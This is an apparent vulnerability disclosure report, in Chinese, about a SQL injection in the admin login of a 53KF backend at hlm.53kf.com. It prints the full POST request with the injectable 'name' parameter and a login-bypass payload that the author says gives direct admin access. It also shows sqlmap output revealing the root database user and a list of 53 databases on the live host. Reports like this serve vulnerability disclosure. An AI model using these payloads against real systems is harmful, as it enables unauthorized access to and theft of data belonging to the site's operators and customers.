53KF某后台MySQL盲注(root)

### 简要描述： 53KF某后台MySQL盲注(root) ### 详细说明： 注射点： ``` POST /check.php HTTP/1.1 Content-Length: 166 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://hlm.53kf.com Host: hlm.53kf.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4 Accept: */* Submit=&action=login&name=admin' or 1=1* or '1aa'='1&pwd=test ``` name可注入，本身是很简单的注入,SQLmap设定--risk=3竟然跑不出来。于是构造了下参数让注入更明显一点： ``` admin' or 1=1* or '1aa'='1 ``` ### 漏洞证明： 用户名输入： admin' or 1=1 or '1'='-- 可以直接登陆后台： [<img src="https://images.seebug.org/upload/201505/19211236bc51c5bf24c0d02c8c96cccc0dc3f7a6.png" alt="53kf.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/19211236bc51c5bf24c0d02c8c96cccc0dc3f7a6.png) 让SQLmap跑一下： ``` current user: 'root@localhost' current database: 'hlm' available databases [53]: [*] `13jian` [*] bak [*] entalk [*] hk_kf [*] hk_kf1 [*] hk_talk [*] hlm [*] income [*] information_schema [*] ip [*] ip2 [*] ip_110711 [*] ip_src [*] kf [*] kf1 [*] mysql [*] oem [*] oem_168kf_kf [*] oem_168kf_kf1 [*] oem_168kf_talk [*] oem_del [*] oem_ekt_kf [*] oem_ekt_kf1 [*] oem_ekt_talk [*] oem_old [*] oem_test [*] oem_tzchat_kf [*] oem_tzchat_kf1 [*] oem_tzchat_kf1_new [*] oem_tzchat_kf_new [*] oem_tzchat_talk [*] oem_tzchat_talk_new [*] oem_wb_kf [*] oem_wb_kf1 [*] oem_wb_talk [*] oem_yitian_kf [*] oem_yitian_kf1 [*] oem_yitian_kf1_new [*] oem_yitian_kf_new [*] oem_yitian_talk [*] oem_yitian_talk_new [*] oem_ywdj_kf [*] oem_ywdj_kf1 [*] oem_ywdj_talk [*] srv_kf [*] srv_kf1 [*] srv_talk [*] stat [*] talk [*] test [*] tw [*] tw1 [*] twtalk ```